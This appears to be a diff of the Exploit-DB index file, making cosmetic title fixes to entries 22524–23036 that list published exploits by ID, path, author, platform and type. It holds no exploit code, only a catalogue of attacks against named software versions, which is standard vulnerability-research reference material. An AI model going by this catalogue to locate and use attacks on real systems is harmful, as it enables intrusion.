22524,platforms/php/webapps/22524.txt,"ZenPhoto 1.4.3.3 - Multiple Vulnerabilities",2012-11-06,waraxe,php,webapps,0 -22525,platforms/windows/remote/22525.rb,"EMC Networker - Format String",2012-11-07,Metasploit,windows,remote,0 +22525,platforms/windows/remote/22525.rb,"EMC NetWorker - Format String",2012-11-07,Metasploit,windows,remote,0 22526,platforms/windows/remote/22526.rb,"WinRM - VBS Remote Code Execution",2012-11-07,Metasploit,windows,remote,0 22527,platforms/linux/dos/22527.c,"Xeneo Web Server 2.2.10 - Undisclosed Buffer Overflow",2003-04-23,badpack3t,linux,dos,0 22528,platforms/windows/local/22528.c,"Microsoft Windows 2000 - RegEdit.exe Registry Key Value Buffer Overflow",2003-04-09,ThreaT,windows,local,0 @@ -19793,7 +19794,7 @@ id,file,description,date,author,platform,type,port 22544,platforms/cfm/webapps/22544.txt,"Macromedia ColdFusion MX 6.0 - Error Message Full Path Disclosure",2003-04-26,"Network Intelligence",cfm,webapps,0 22545,platforms/cgi/webapps/22545.pl,"Mike Bobbitt Album.PL 0.61 - Remote Command Execution",2003-04-26,aresu@bosen.net,cgi,webapps,0 22546,platforms/windows/remote/22546.txt,"Opera 7.0/7.10 - JavaScript Console Single Quote Attribute Injection",2003-04-28,nesumin,windows,remote,0 -22547,platforms/php/webapps/22547.php,"Invision Power Board 3.3.4 - unserialize Regex Bypass",2012-11-07,webDEViL,php,webapps,0 +22547,platforms/php/webapps/22547.php,"Invision Power Board 3.3.4 - Unserialize Regex Bypass",2012-11-07,webDEViL,php,webapps,0 22548,platforms/php/webapps/22548.txt,"Xivo 1.2 - Arbitrary File Download",2012-11-07,Mr.Un1k0d3r,php,webapps,0 22549,platforms/hardware/webapps/22549.txt,"AVerCaster Pro RS3400 Web Server - Directory Traversal",2012-11-07,"Patrick Saladino",hardware,webapps,0 22550,platforms/windows/dos/22550.pl,"Opera 6.0.x/7.0 - Long File Name Remote Heap Corruption",2003-04-28,"imagine & nesumin",windows,dos,0 @@ -19808,14 +19809,14 @@ id,file,description,date,author,platform,type,port 22559,platforms/cgi/webapps/22559.pl,"Stockman Shopping Cart 7.8 - Arbitrary Command Execution",2003-05-01,"Aleksey Sintsov",cgi,webapps,0 22560,platforms/linux/dos/22560.txt,"KDE Konqueror 3.0.3 - Malformed HTML Page Denial of Service",2003-05-02,Joachim_Strombergson,linux,dos,0 22561,platforms/hp-ux/dos/22561.txt,"HP-UX 11 RWrite - Buffer Overflow",2003-05-02,bt@delfi.lt,hp-ux,dos,0 -22562,platforms/windows/remote/22562.pl,"Microsoft IIS 5 - User Existence Disclosure (1)",1999-02-24,JeiAr,windows,remote,0 -22563,platforms/windows/remote/22563.pl,"Microsoft IIS 5 - User Existence Disclosure (2)",1999-02-24,JeiAr,windows,remote,0 +22562,platforms/windows/remote/22562.pl,"Microsoft IIS 5.0 - User Existence Disclosure (1)",1999-02-24,JeiAr,windows,remote,0 +22563,platforms/windows/remote/22563.pl,"Microsoft IIS 5.0 - User Existence Disclosure (2)",1999-02-24,JeiAr,windows,remote,0 22564,platforms/windows/local/22564.c,"FlashFXP 1.4 - User Password Encryption",2003-05-05,DVDMAN,windows,local,0 22565,platforms/linux/local/22565.c,"MySQL 3.x/4.0.x - Weak Password Encryption",2003-05-05,"Secret Squirrel",linux,local,0 22566,platforms/freebsd/local/22566.pl,"Youbin 2.5/3.0/3.4 - HOME Buffer Overflow",2003-05-06,"Knud Erik Hojgaard",freebsd,local,0 22567,platforms/linux/local/22567.c,"Leksbot 1.2 - Multiple Unspecified Vulnerabilities",2003-05-06,gunzip,linux,local,0 -22568,platforms/windows/dos/22568.pl,"Floosietek FTGate PRO 1.22 - SMTP MAIL FROM Buffer Overflow",2003-05-06,"Dennis Rand",windows,dos,0 -22569,platforms/windows/dos/22569.pl,"Floosietek FTGate PRO 1.22 - SMTP RCPT TO Buffer Overflow",2003-05-06,"Dennis Rand",windows,dos,0 +22568,platforms/windows/dos/22568.pl,"FloosieTek FTGate PRO 1.22 - SMTP MAIL FROM Buffer Overflow",2003-05-06,"Dennis Rand",windows,dos,0 +22569,platforms/windows/dos/22569.pl,"FloosieTek FTGate PRO 1.22 - SMTP RCPT TO Buffer Overflow",2003-05-06,"Dennis Rand",windows,dos,0 22572,platforms/cgi/webapps/22572.pl,"HappyMall E-Commerce Software 4.3/4.4 - Member_HTML.cgi Command Execution",2003-05-08,"Revin Aldi",cgi,webapps,0 22573,platforms/freebsd/local/22573.pl,"ListProc 8.2.9 - Catmail ULISTPROC_UMASK Buffer Overflow",2003-05-08,kf,freebsd,local,0 22574,platforms/freebsd/local/22574.pl,"Lgames LTris 1.0.1 - Local Memory Corruption",2003-05-09,"Knud Erik Hojgaard",freebsd,local,0 @@ -19834,7 +19835,7 @@ id,file,description,date,author,platform,type,port 22587,platforms/windows/dos/22587.c,"Pi3Web 2.0.1 - Malformed GET Request Denial of Service",2003-04-26,"Angelo Rosiello",windows,dos,0 22588,platforms/cgi/webapps/22588.txt,"Happymall E-Commerce Software 4.3/4.4 - Normal_HTML.cgi Cross-Site Scripting",2003-05-12,"Julio Cesar",cgi,webapps,0 22589,platforms/php/webapps/22589.txt,"PHP-Nuke 5.x/6.x Web_Links Module - SQL Injection",2003-05-12,"Albert Puigsech Galicia",php,webapps,0 -22590,platforms/php/webapps/22590.txt,"netOffice Dwins 1.4p3 - SQL Injection",2012-11-09,dun,php,webapps,0 +22590,platforms/php/webapps/22590.txt,"NetOffice Dwins 1.4p3 - SQL Injection",2012-11-09,dun,php,webapps,0 22591,platforms/windows/dos/22591.txt,"Microsoft Excel 2007 - WriteAV Crash (PoC)",2012-11-09,coolkaveh,windows,dos,0 22592,platforms/cgi/webapps/22592.txt,"Happymall E-Commerce Software 4.3/4.4 - Normal_HTML.cgi File Disclosure",2003-05-12,"Julio Cesar",cgi,webapps,0 22593,platforms/windows/remote/22593.html,"Yahoo! Voice Chat ActiveX Control 1.0.0.43 - Buffer Overflow",2003-05-12,cesaro,windows,remote,0 @@ -19865,7 +19866,7 @@ id,file,description,date,author,platform,type,port 22618,platforms/php/webapps/22618.txt,"ttCMS 2.2/2.3 / ttForum 1.1 - 'index.php' Instant-Messages Preferences SQL Injection",2003-05-20,ScriptSlave@gmx.net,php,webapps,0 22619,platforms/linux/dos/22619.txt,"CUPS 1.1.x - Cupsd Request Method Denial of Service",2003-05-20,"Phil D'Amore",linux,dos,0 22620,platforms/windows/remote/22620.txt,"Working Resources BadBlue 1.7.x/2.x - Unauthorized HTS Access",2003-05-20,mattmurphy,windows,remote,0 -22621,platforms/windows/dos/22621.txt,"Microsoft Netmeeting 2.1/3.0.1 4.4.3385 - CALLTO URL Buffer Overflow",2003-05-20,"David F. Madrid",windows,dos,0 +22621,platforms/windows/dos/22621.txt,"Microsoft NetMeeting 2.1/3.0.1 4.4.3385 - CALLTO URL Buffer Overflow",2003-05-20,"David F. Madrid",windows,dos,0 22622,platforms/linux/remote/22622.txt,"WSMP3 0.0.x - Remote Information Disclosure",2003-05-21,"dong-h0un U",linux,remote,0 22623,platforms/linux/remote/22623.txt,"WSMP3 0.0.x - Remote Command Execution",2003-05-21,"dong-h0un U",linux,remote,0 22624,platforms/linux/dos/22624.c,"BZFlag 1.7 g0 - Reconnect Denial of Service",2003-05-21,"russian code molester",linux,dos,0 @@ -19894,7 +19895,7 @@ id,file,description,date,author,platform,type,port 22647,platforms/hardware/dos/22647.txt,"D-Link DI-704P - Syslog.HTM Denial of Service",2003-05-26,"Chris R",hardware,dos,0 22648,platforms/unix/remote/22648.txt,"Vignette 4/5 - Cross-Site Scripting",2003-05-26,"Ramon Pinuaga Cascales",unix,remote,0 22649,platforms/multiple/remote/22649.txt,"P-News 1.16 - Administrative Account Creation",2003-05-24,"Peter Winter-Smith",multiple,remote,0 -22650,platforms/multiple/dos/22650.py,"BRS WebWeaver 1.0 4 - POST and HEAD Denial of Service",2003-05-26,euronymous,multiple,dos,0 +22650,platforms/multiple/dos/22650.py,"BRS Webweaver 1.0 4 - POST and HEAD Denial of Service",2003-05-26,euronymous,multiple,dos,0 22651,platforms/php/webapps/22651.txt,"PostNuke 0.72x Phoenix Glossary Module - SQL Injection",2003-05-26,"Lorenzo Manuel Hernandez Garcia-Hierro",php,webapps,0 22652,platforms/windows/local/22652.py,"Zoner Photo Studio 15 Build 3 - 'Zps.exe' Registry Value Parsing Exploit",2012-11-12,"Julien Ahrens",windows,local,0 22653,platforms/windows/dos/22653.py,"Smadav Anti Virus 9.1 - Crash (PoC)",2012-11-12,"Mada R Perdhana",windows,dos,0 @@ -19914,27 +19915,27 @@ id,file,description,date,author,platform,type,port 22667,platforms/windows/dos/22667.txt,"BaSoMail 1.24 - POP3 Server Denial of Service",2003-05-28,"Ziv Kamir",windows,dos,0 22668,platforms/windows/dos/22668.txt,"BaSoMail 1.24 - SMTP Server Command Buffer Overflow",2003-05-28,"Ziv Kamir",windows,dos,0 22669,platforms/cgi/webapps/22669.txt,"Bandmin 1.4 - Cross-Site Scripting",2003-05-28,"silent needel",cgi,webapps,0 -22670,platforms/windows/dos/22670.c,"Microsoft IIS 5 WebDAV - PROPFIND and SEARCH Method Denial of Service",2003-05-28,Neo1,windows,dos,0 +22670,platforms/windows/dos/22670.c,"Microsoft IIS 5.0 - WebDAV PROPFIND and SEARCH Method Denial of Service",2003-05-28,Neo1,windows,dos,0 22671,platforms/php/webapps/22671.txt,"Webfroot Shoutbox 2.32 - URI Parameter File Disclosure",2003-05-29,pokleyzz,php,webapps,0 22672,platforms/php/webapps/22672.txt,"Cafelog b2 0.6 - Remote File Inclusion",2003-05-29,pokleyzz,php,webapps,0 -22673,platforms/asp/webapps/22673.txt,"Philboard 1.14 - philboard_admin.asp Authentication Bypass",2003-05-29,aresu@bosen.net,asp,webapps,0 +22673,platforms/asp/webapps/22673.txt,"philboard 1.14 - philboard_admin.asp Authentication Bypass",2003-05-29,aresu@bosen.net,asp,webapps,0 22674,platforms/windows/remote/22674.txt,"M-TECH P-Synch 6.2.5 - Full Path Disclosure",2003-05-29,JeiAr,windows,remote,0 22675,platforms/php/webapps/22675.txt,"Geeklog 1.3.x - Authentication SQL Injection",2003-05-29,pokleyzz,php,webapps,0 22676,platforms/windows/remote/22676.txt,"M-TECH P-Synch 6.2.5 - nph-psf.exe css Parameter Cross-Site Scripting",2003-05-29,JeiAr,windows,remote,0 22677,platforms/windows/remote/22677.txt,"M-TECH P-Synch 6.2.5 - nph-psa.exe css Parameter Cross-Site Scripting",2003-05-29,JeiAr,windows,remote,0 -22678,platforms/windows/remote/22678.rb,"Jira Scriptrunner 2.0.7 - Cross-Site Request Forgery / Remote Code Execution Exploit (Metasploit)",2012-11-13,"Ben Sheppard",windows,remote,0 +22678,platforms/windows/remote/22678.rb,"Jira Scriptrunner 2.0.7 - Cross-Site Request Forgery / Remote Code Execution (Metasploit)",2012-11-13,"Ben Sheppard",windows,remote,0 22679,platforms/windows/dos/22679.txt,"Microsoft Visio 2010 - Crash (PoC)",2012-11-13,coolkaveh,windows,dos,0 -22680,platforms/windows/dos/22680.txt,"IrfanView - .RLE Image Decompression Buffer Overflow",2012-11-13,"Francis Provencher",windows,dos,0 -22681,platforms/windows/dos/22681.txt,"IrfanView - .TIF Image Decompression Buffer Overflow",2012-11-13,"Francis Provencher",windows,dos,0 +22680,platforms/windows/dos/22680.txt,"Irfanview - '.RLE' Image Decompression Buffer Overflow",2012-11-13,"Francis Provencher",windows,dos,0 +22681,platforms/windows/dos/22681.txt,"Irfanview - '.TIF' Image Decompression Buffer Overflow",2012-11-13,"Francis Provencher",windows,dos,0 22683,platforms/linux/local/22683.pl,"HT Editor 2.0.20 - Buffer Overflow (ROP PoC)",2012-11-13,ZadYree,linux,local,0 22684,platforms/php/webapps/22684.txt,"Eventy CMS 1.8 Plus - Multiple Vulnerabilities",2012-11-13,Vulnerability-Lab,php,webapps,0 22685,platforms/windows/dos/22685.txt,"Zoner Photo Studio 15 b3 - Buffer Overflow",2012-11-13,Vulnerability-Lab,windows,dos,0 -22686,platforms/php/remote/22686.rb,"Invision IP.Board 3.3.4 - unserialize() PHP Code Execution",2012-11-13,Metasploit,php,remote,0 +22686,platforms/php/remote/22686.rb,"Invision IP.Board 3.3.4 - Unserialize() PHP Code Execution",2012-11-13,Metasploit,php,remote,0 22687,platforms/php/webapps/22687.pl,"Webfroot Shoutbox 2.32 - Remote Command Execution",2003-05-29,pokleyzz,php,webapps,0 22688,platforms/cgi/webapps/22688.txt,"M-TECH P-Synch 6.2.5 - nph-psf.exe css Parameter Remote File Inclusion",2003-05-29,JeiAr,cgi,webapps,0 22689,platforms/cgi/webapps/22689.txt,"M-TECH P-Synch 6.2.5 - nph-psa.exe css Parameter Remote File Inclusion",2003-05-29,JeiAr,cgi,webapps,0 22690,platforms/windows/dos/22690.c,"Activity Monitor 2002 2.6 - Remote Denial of Service",2003-05-29,"Luca Ercoli",windows,dos,0 -22691,platforms/windows/remote/22691.txt,"pablo software solutions baby ftp server 1.2 - Directory Traversal",2003-05-29,dr_insane,windows,remote,0 +22691,platforms/windows/remote/22691.txt,"pablo software Solutions baby ftp server 1.2 - Directory Traversal",2003-05-29,dr_insane,windows,remote,0 22692,platforms/cgi/webapps/22692.txt,"Zeus Web Server 4.x - Admin Interface VS_Diag.cgi Cross-Site Scripting",2003-05-29,"Hugo Vazquez",cgi,webapps,0 22693,platforms/php/webapps/22693.txt,"cPanel 5/6 / Formail-Clone - E-Mail Restriction Bypass",2003-05-30,"Chad C. Keep",php,webapps,0 22694,platforms/windows/dos/22694.c,"Desktop Orbiter 2.0 1 - Resource Exhaustion Denial of Service",2003-05-30,"Luca Ercoli",windows,dos,0 @@ -19948,7 +19949,7 @@ id,file,description,date,author,platform,type,port 22702,platforms/php/webapps/22702.pl,"Webfroot Shoutbox 2.32 - Expanded.php Remote Command Execution",2003-06-02,_6mO_HaCk,php,webapps,0 22703,platforms/linux/local/22703.c,"XMame 0.6x - Lang Local Buffer Overflow",2003-03-31,"Gabriel A. Maggiotti",linux,local,0 22704,platforms/php/webapps/22704.txt,"Webchat 2.0 Module - Full Path Disclosure",2003-06-02,"Rynho Zeros Web",php,webapps,0 -22705,platforms/php/webapps/22705.txt,"Webfroot Shoutbox 2.32 - Expanded.php Remote Directory Traversal",2003-06-02,_6mO_HaCk,php,webapps,0 +22705,platforms/php/webapps/22705.txt,"Webfroot Shoutbox 2.32 - Expanded.php Directory Traversal",2003-06-02,_6mO_HaCk,php,webapps,0 22706,platforms/windows/dos/22706.asm,"Crob FTP Server 2.50.4 - Remote Username Format String",2003-06-02,"Luca Ercoli",windows,dos,0 22707,platforms/windows/dos/22707.txt,"Novell Groupwise Internet Agent - LDAP BIND Request Overflow",2012-11-14,"Francis Provencher",windows,dos,0 22708,platforms/php/webapps/22708.txt,"dotProject 2.1.6 - Remote File Inclusion",2012-11-14,dun,php,webapps,0 @@ -19966,7 +19967,7 @@ id,file,description,date,author,platform,type,port 22720,platforms/linux/local/22720.c,"kon2 - Local Buffer Overflow (2)",2003-06-03,c0ntex,linux,local,0 22721,platforms/windows/remote/22721.txt,"Pablo Software Solutions FTP Service 1.2 - Anonymous Users Privileges",2003-06-03,JeiAr,windows,remote,0 22722,platforms/windows/remote/22722.txt,"Pablo Software Solutions FTP Service 1.2 - Plaintext Password",2003-06-03,JeiAr,windows,remote,0 -22723,platforms/windows/remote/22723.txt,"MegaBrowser 0.3 - HTTP Directory Traversal File Disclosure",2003-06-04,JeiAr,windows,remote,0 +22723,platforms/windows/remote/22723.txt,"MegaBrowser 0.3 - HTTP Directory Traversal",2003-06-04,JeiAr,windows,remote,0 22724,platforms/asp/webapps/22724.txt,"Xpressions Interactive - Multiple SQL Injections",2003-06-04,"Paul Craig",asp,webapps,0 22725,platforms/php/webapps/22725.txt,"PHP 4 - PHPInfo Cross-Site Scripting",2002-10-12,"Matthew Murphy",php,webapps,0 22726,platforms/windows/remote/22726.txt,"Microsoft Internet Explorer 5 - OBJECT Tag Buffer Overflow",2003-06-04,FelineMenace,windows,remote,0 @@ -19977,7 +19978,7 @@ id,file,description,date,author,platform,type,port 22731,platforms/asp/webapps/22731.txt,"Mailtraq 2.2 - Webmail Utility Full Path Disclosure",2003-06-04,"Ziv Kamir",asp,webapps,0 22732,platforms/multiple/local/22732.java,"Sun JRE/SDK 1.x - Untrusted Applet Java Security Model Violation",2003-06-05,"Marc Schoenefeld",multiple,local,0 22733,platforms/hp-ux/remote/22733.c,"HP-UX FTPD 1.1.214.4 - REST Command Memory Disclosure",2003-06-05,di0aD,hp-ux,remote,0 -22734,platforms/windows/remote/22734.html,"Microsoft Internet Explorer 6 - %USERPROFILE% File Execution",2003-06-05,"Eiji James Yoshida",windows,remote,0 +22734,platforms/windows/remote/22734.html,"Microsoft Internet Explorer 6 -' %USERPROFILE%' File Execution",2003-06-05,"Eiji James Yoshida",windows,remote,0 22735,platforms/php/webapps/22735.txt,"iDev Rentals 1.0 - Multiple Vulnerabilities",2012-11-15,Vulnerability-Lab,php,webapps,0 22736,platforms/php/webapps/22736.txt,"Friends in War Make or Break 1.3 - SQL Injection (Authentication Bypass)",2012-11-15,d3b4g,php,webapps,0 22737,platforms/windows/remote/22737.txt,"Novell NetIQ Privileged User Manager 2.3.1 - auth.dll pa_modify_accounts() Remote Code Execution",2012-11-15,rgod,windows,remote,0 @@ -19988,8 +19989,8 @@ id,file,description,date,author,platform,type,port 22743,platforms/cgi/webapps/22743.txt,"ImageFolio 2.2x/3.0/3.1 - Admin.cgi Directory Traversal",2003-06-05,"Paul Craig",cgi,webapps,0 22744,platforms/asp/webapps/22744.txt,"Synkron.Web 3.0 - HTML Injection",2003-06-06,Gyrniff,asp,webapps,0 22745,platforms/linux/local/22745.c,"Zblast 1.2 - Local Username Buffer Overrun",2003-06-06,V9,linux,local,0 -22746,platforms/asp/webapps/22746.txt,"MaxWebPortal 1.30 - search.asp Search Parameter Cross-Site Scripting",2003-06-06,JeiAr,asp,webapps,0 -22747,platforms/asp/webapps/22747.txt,"MaxWebPortal 1.30 - Remote Database Disclosure",2003-06-06,JeiAr,asp,webapps,0 +22746,platforms/asp/webapps/22746.txt,"Maxwebportal 1.30 - search.asp Search Parameter Cross-Site Scripting",2003-06-06,JeiAr,asp,webapps,0 +22747,platforms/asp/webapps/22747.txt,"Maxwebportal 1.30 - Remote Database Disclosure",2003-06-06,JeiAr,asp,webapps,0 22748,platforms/linux/local/22748.c,"Xaos 3.0 - Language Option Local Buffer Overflow",2003-06-06,bazarr@ziplip.com,linux,local,0 22749,platforms/novell/dos/22749.txt,"Novell Netware 6.0 / eDirectory 8.7 - HTTPSTK.NLM Remote Abend",2003-06-06,"Cheese Head",novell,dos,0 22750,platforms/php/webapps/22750.txt,"Zentrack 2.2/2.3/2.4 - 'index.php' Remote File Inclusion",2003-06-06,farking,php,webapps,0 @@ -20011,7 +20012,7 @@ id,file,description,date,author,platform,type,port 22769,platforms/windows/remote/22769.txt,"Methodus 3 Web Server - File Disclosure",2003-06-13,"Peter Winter-Smith",windows,remote,0 22770,platforms/cgi/webapps/22770.txt,"Infinity CGI Exploit Scanner 3.11 - Cross-Site Scripting",2003-06-12,badpack3t,cgi,webapps,0 22771,platforms/linux/remote/22771.txt,"Adobe Acrobat Reader (UNIX) 5.0 6 / Xpdf 0.9x Hyperlinks - Arbitrary Command Execution",2003-06-13,"Martyn Gilmore",linux,remote,0 -22766,platforms/php/webapps/22766.txt,"friendsinwar FAQ Manager - 'view_faq.php question parameter' SQL Injection",2012-11-16,unsuprise,php,webapps,0 +22766,platforms/php/webapps/22766.txt,"friendsinwar FAQ Manager - 'view_faq.php question Parameter' SQL Injection",2012-11-16,unsuprise,php,webapps,0 22772,platforms/cgi/webapps/22772.txt,"Infinity CGI Exploit Scanner 3.11 - Remote Command Execution",2003-06-12,badpack3t,cgi,webapps,0 22773,platforms/linux/local/22773.c,"Progress Database 9.1 - Environment Variable Privilege Escalation",2003-06-14,kf,linux,local,0 22774,platforms/windows/dos/22774.txt,"myServer 0.4.1 - Signal Handling Denial of Service",2003-06-14,LynX,windows,dos,0 @@ -20035,15 +20036,15 @@ id,file,description,date,author,platform,type,port 22792,platforms/php/webapps/22792.txt,"SquirrelMail 1.2.11 - Administrator Plugin options.php Arbitrary Admin Account Creation",2003-06-17,dr_insane,php,webapps,0 22793,platforms/php/webapps/22793.txt,"SquirrelMail 1.2.11 - Exploit",2003-06-17,dr_insane,php,webapps,0 22794,platforms/windows/dos/22794.txt,"Proxomitron Proxy Server - Long Get Request Remote Denial of Service",2003-06-17,dr_insane,windows,dos,0 -22795,platforms/windows/remote/22795.txt,"MiniHTTPServer WebForums Server 1.x/2.0 - Remote Directory Traversal",2003-06-18,dr_insane,windows,remote,0 +22795,platforms/windows/remote/22795.txt,"MiniHTTPServer WebForums Server 1.x/2.0 - Directory Traversal",2003-06-18,dr_insane,windows,remote,0 22796,platforms/linux/dos/22796.php,"MidHosting FTP Daemon 1.0.1 - Shared Memory Local Denial of Service",2003-06-18,"Frank DENIS",linux,dos,0 22797,platforms/hardware/dos/22797.txt,"Avaya Cajun P130/P133/P330/P333 Network Switch - Connection Stalling Denial of Service",2003-06-18,"Jacek Lipkowski",hardware,dos,0 22798,platforms/php/webapps/22798.txt,"phpMyAdmin 2.x - Information Disclosure",2003-06-18,"Lorenzo Manuel Hernandez Garcia-Hierro",php,webapps,0 22799,platforms/cgi/webapps/22799.txt,"Kerio MailServer 5.6.3 - Web Mail ADD_ACL Module Cross-Site Scripting",2003-06-18,"David F.Madrid",cgi,webapps,0 -22800,platforms/linux/dos/22800.txt,"Kerio Mailserver 5.6.3 subscribe Module - Overflow Exploit",2003-06-18,"David F.Madrid",linux,dos,0 -22801,platforms/linux/dos/22801.txt,"Kerio Mailserver 5.6.3 - add_acl Module Overflow",2003-06-18,"David F.Madrid",linux,dos,0 -22802,platforms/linux/dos/22802.txt,"Kerio Mailserver 5.6.3 list Module - Overflow Exploit",2003-06-18,"David F.Madrid",linux,dos,0 -22803,platforms/linux/dos/22803.txt,"Kerio Mailserver 5.6.3 do_map Module - Overflow Exploit",2003-06-18,"David F.Madrid",linux,dos,0 +22800,platforms/linux/dos/22800.txt,"Kerio MailServer 5.6.3 subscribe Module - Overflow Exploit",2003-06-18,"David F.Madrid",linux,dos,0 +22801,platforms/linux/dos/22801.txt,"Kerio MailServer 5.6.3 - add_acl Module Overflow",2003-06-18,"David F.Madrid",linux,dos,0 +22802,platforms/linux/dos/22802.txt,"Kerio MailServer 5.6.3 list Module - Overflow Exploit",2003-06-18,"David F.Madrid",linux,dos,0 +22803,platforms/linux/dos/22803.txt,"Kerio MailServer 5.6.3 do_map Module - Overflow Exploit",2003-06-18,"David F.Madrid",linux,dos,0 22804,platforms/cgi/webapps/22804.txt,"Kerio MailServer 5.6.3 - Web Mail DO_MAP Module Cross-Site Scripting",2003-06-18,"David F.Madrid",cgi,webapps,0 22805,platforms/jsp/webapps/22805.txt,"Tmax Soft JEUS 3.1.4 p1 - URL.jsp Cross-Site Scripting",2003-06-17,"Jeremy Bae",jsp,webapps,0 22806,platforms/linux/local/22806.sh,"SDFingerD 1.1 - Failure To Drop Privileges Privilege Escalation",2003-06-19,V9,linux,local,0 @@ -20052,9 +20053,9 @@ id,file,description,date,author,platform,type,port 22809,platforms/php/webapps/22809.txt,"pMachine 1.0/2.x - Multiple Script sfx Parameter Full Path Disclosure",2003-06-19,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22810,platforms/php/webapps/22810.txt,"pMachine 1.0/2.x - Search Module Cross-Site Scripting",2003-06-19,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22811,platforms/bsd/local/22811.c,"Abuse-SDL 0.7 - Command-Line Argument Buffer Overflow",2003-06-19,Matrix_DK,bsd,local,0 -22812,platforms/php/webapps/22812.txt,"WebJeff Filemanager 1.6 - File Disclosure",2003-06-20,"Adam Stephens",php,webapps,0 +22812,platforms/php/webapps/22812.txt,"WebJeff FileManager 1.6 - File Disclosure",2003-06-20,"Adam Stephens",php,webapps,0 22813,platforms/linux/local/22813.c,"Linux Kernel 2.2.x / 2.4.x - /proc Filesystem Potential Information Disclosure",2003-06-20,IhaQueR,linux,local,0 -22814,platforms/linux/dos/22814.txt,"GNU GNATS 3.0 02 - PR-Edit Command Line Option Heap Corruption Vulnerablity",2003-06-21,"dong-h0un U",linux,dos,0 +22814,platforms/linux/dos/22814.txt,"GNU GNATS 3.0 02 - PR-Edit Command Line Option Heap Corruption",2003-06-21,"dong-h0un U",linux,dos,0 22815,platforms/linux/local/22815.c,"GNU GNATS 3.113 - Environment Variable Buffer Overflow",2003-06-21,Xpl017Elz,linux,local,0 22816,platforms/windows/dos/22816.txt,"Symantec Security Check RuFSI - ActiveX Control Buffer Overflow",2003-06-23,"Cesar Cerrudo",windows,dos,0 22817,platforms/windows/dos/22817.pl,"MyServer 0.4.1 - Remote Denial of Service",2003-06-23,eip,windows,dos,0 @@ -20069,7 +20070,7 @@ id,file,description,date,author,platform,type,port 22826,platforms/php/webapps/22826.txt,"VisNetic WebMail 5.8.6 .6 - Information Disclosure",2003-06-23,posidron,php,webapps,0 22827,platforms/windows/remote/22827.txt,"Compaq Web-Based Management Agent - Remote File Verification",2003-06-23,"Ian Vitek",windows,remote,0 22828,platforms/php/webapps/22828.txt,"WeBid 1.0.5 - Cross-Site Scripting",2012-11-19,"Woody Hughes",php,webapps,0 -22830,platforms/linux/remote/22830.c,"LBreakOut2 2.x - Login Remote Format String",2003-06-24,V9,linux,remote,0 +22830,platforms/linux/remote/22830.c,"LBreakout2 2.x - Login Remote Format String",2003-06-24,V9,linux,remote,0 22831,platforms/freebsd/dos/22831.pl,"Gkrellmd 2.1 - Remote Buffer Overflow (1)",2003-06-24,dodo,freebsd,dos,0 22832,platforms/freebsd/remote/22832.pl,"Gkrellmd 2.1 - Remote Buffer Overflow (2)",2003-06-24,dodo,freebsd,remote,0 22833,platforms/windows/remote/22833.c,"Alt-N WebAdmin 2.0.x - USER Parameter Buffer Overflow (1)",2003-06-24,"Mark Litchfield",windows,remote,0 @@ -20077,9 +20078,9 @@ id,file,description,date,author,platform,type,port 22835,platforms/windows/local/22835.c,"Tripbit Secure Code Analizer 1.0 - Local fgets() Buffer Overrun",2003-06-24,posidron,windows,local,0 22836,platforms/linux/local/22836.pl,"Elm 2.3/2.4 - Local TERM Environment Variable Buffer Overrun",1997-05-13,kokanin,linux,local,0 22837,platforms/windows/remote/22837.c,"Microsoft Windows 2000/NT 4 Media Services - nsiislog.dll Remote Buffer Overflow",2003-06-25,firew0rker,windows,remote,0 -22838,platforms/windows/remote/22838.txt,"BRS WebWeaver 1.0 - Error Page Cross-Site Scripting",2003-06-26,"Carsten H. Eiram",windows,remote,0 +22838,platforms/windows/remote/22838.txt,"BRS Webweaver 1.0 - Error Page Cross-Site Scripting",2003-06-26,"Carsten H. Eiram",windows,remote,0 22839,platforms/linux/dos/22839.c,"methane IRCd 0.1.1 - Remote Format String",2003-06-27,Dinos,linux,dos,0 -22840,platforms/linux/local/22840.c,"Linux Kernel 2.4 - suid execve() System Call Race Condition Executable File Read (PoC)",2003-06-26,IhaQueR,linux,local,0 +22840,platforms/linux/local/22840.c,"Linux Kernel 2.4 - SUID execve() System Call Race Condition Executable File Read (PoC)",2003-06-26,IhaQueR,linux,local,0 22841,platforms/php/webapps/22841.txt,"iXmail 0.2/0.3 - iXmail_NetAttach.php File Deletion",2003-06-26,leseulfrog,php,webapps,0 22842,platforms/php/webapps/22842.txt,"CutePHP CuteNews 1.3 - HTML Injection",2003-06-29,"Peter Winter-Smith",php,webapps,0 22843,platforms/cgi/webapps/22843.txt,"MegaBook 1.1/2.0/2.1 - Multiple HTML Injection Vulnerabilities",2003-06-29,"Morning Wood",cgi,webapps,0 @@ -20092,7 +20093,7 @@ id,file,description,date,author,platform,type,port 22850,platforms/windows/dos/22850.txt,"Microsoft Office OneNote 2010 - Crash (PoC)",2012-11-20,coolkaveh,windows,dos,0 22851,platforms/windows/local/22851.py,"FormatFactory 3.0.1 - Profile File Handling Buffer Overflow",2012-11-20,"Julien Ahrens",windows,local,0 22852,platforms/multiple/webapps/22852.txt,"SonicWALL CDP 5040 6.x - Multiple Vulnerabilities",2012-11-20,Vulnerability-Lab,multiple,webapps,0 -22853,platforms/php/webapps/22853.txt,"Wordpress Facebook Survey 1.0 Plugin - SQL Injection",2012-11-20,"Vulnerability Research Laboratory",php,webapps,0 +22853,platforms/php/webapps/22853.txt,"WordPress Facebook Survey 1.0 Plugin - SQL Injection",2012-11-20,"Vulnerability Research Laboratory",php,webapps,0 22854,platforms/windows/remote/22854.txt,"LAN.FS Messenger 2.4 - Command Execution",2012-11-20,Vulnerability-Lab,windows,remote,0 22855,platforms/windows/dos/22855.txt,"Apple QuickTime 7.7.2 - Targa image Buffer Overflow",2012-11-20,"Senator of Pirates",windows,dos,0 22856,platforms/linux/remote/22856.rb,"Narcissus Image Configuration - Passthru",2012-11-21,Metasploit,linux,remote,0 @@ -20121,7 +20122,7 @@ id,file,description,date,author,platform,type,port 22879,platforms/windows/webapps/22879.txt,"ManageEngine ServiceDesk 8.0 - Multiple Vulnerabilities",2012-11-21,Vulnerability-Lab,windows,webapps,0 23034,platforms/windows/remote/23034.txt,"Microsoft URLScan 2.5/RSA Security SecurID 5.0 - Configuration Enumeration",2003-08-14,"Andy Davis",windows,remote,0 23035,platforms/asp/webapps/23035.txt,"Poster 2.0 - Unauthorized Privileged User Access",2003-08-15,DarkKnight,asp,webapps,0 -23036,platforms/php/webapps/23036.txt,"MatrikzGB GuestBook 2.0 - Administrative Privilege Escalation",2003-08-16,"Stephan Sattler",php,webapps,0 